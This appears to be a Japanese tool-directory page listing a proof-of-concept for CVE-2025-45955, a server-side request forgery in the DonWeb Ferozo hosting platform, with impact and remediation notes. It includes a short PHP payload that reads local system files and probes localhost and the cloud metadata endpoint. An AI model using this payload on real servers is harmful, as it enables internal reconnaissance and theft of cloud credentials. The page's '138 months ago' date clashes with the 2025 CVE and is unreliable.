Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-45955 — CVE-2025-45955の概念実証エクスプロイト。DonWeb FerozoホスティングプラットフォームのServer-Side Request Forgery(SSRF)を実証し、内部インフラストラクチャのマッピングとクラウドメタデータの列挙を可能にします。 | Kitploit
ツール/GitHubGitHub/surendrapuppala7/cve-2025-45955
偵察脆弱性分析エクスプロイト情報収集ウェブセキュリティクラウドセキュリティ
GitHubsurendrapuppala7/cve-2025-45955

CVE-2025-45955

CVE-2025-45955の概念実証エクスプロイト。DonWeb FerozoホスティングプラットフォームのServer-Side Request Forgery(SSRF)を実証し、内部インフラストラクチャのマッピングとクラウドメタデータの列挙を可能にします。

リポジトリを見る
138ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-45955

DonWeb Ferozo におけるサーバーサイドリクエストフォージェリ (CVE-2025-45955)

説明

攻撃者は、Ferozo ホスティングプラットフォーム上に特別に細工された PHP ファイルをアップロードして実行することで、この脆弱性を悪用できます。このファイルにアクセスすると、内部サービス(127.0.0.1、169.254.169.254、サービスメッシュエンドポイントなど)、ローカルファイル(例:file:///etc/passwd)、および既知のクラウドメタデータエンドポイントを標的とする一連の SSRF 試行が開始されます。スクリプトはレスポンスまたはエラーメッセージを収集し、攻撃者が内部インフラストラクチャをマッピングし、アクセス可能なサービスを列挙し、さらなる悪用のための機密情報を収集することを可能にします。

概念実証 (PoC)

次のコードはこの脆弱性を実証しています:

root@kitploit:~
<?php
$targets = [
  "file:///etc/hosts",
  "file:///etc/resolv.conf",
  "http://127.0.0.1/",
  "http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
  echo "[*] Trying: $url\n";
  $res = @file_get_contents($url);
  echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>

影響を受けるコンポーネント

  • Ferozo ホスティングプラットフォーム (DonWeb)
  • PHP ベースの環境で、ユーザーがアップロードまたはユーザーが制御する PHP ファイルの実行を許可している環境

影響

  • 情報漏えい: 内部 IP、ファイル内容、クラウドメタデータエンドポイントを漏えいさせる
  • インフラストラクチャの偵察: ポートおよびサービス列挙(Docker、Kubelet など)を可能にする
  • クラウド悪用の可能性: AWS、GCP、Alibaba などの既知のメタデータエンドポイントを調査する
  • 連鎖攻撃の機会: RCE やピボットのために他のローカル脆弱性と組み合わせることができる

修復

  • ファイルインクルードおよび URL アクセス関数(file_get_contents、fopen など)を制限する
  • アウトバウンドファイアウォールルールを介して内部 IP 範囲(127.0.0.0/8、169.254.169.254 など)へのアクセスをブロックする
  • ファイルパスや URL に影響を与える可能性のあるユーザー入力を監査およびサニタイズする

CVE ID

CVE-2025-45955


発見者

報告者: [Facundo Fernandez, Jinook Kim, Surendra Puppala / セキュリティ研究者 | @BYU]

ツールをダウンロード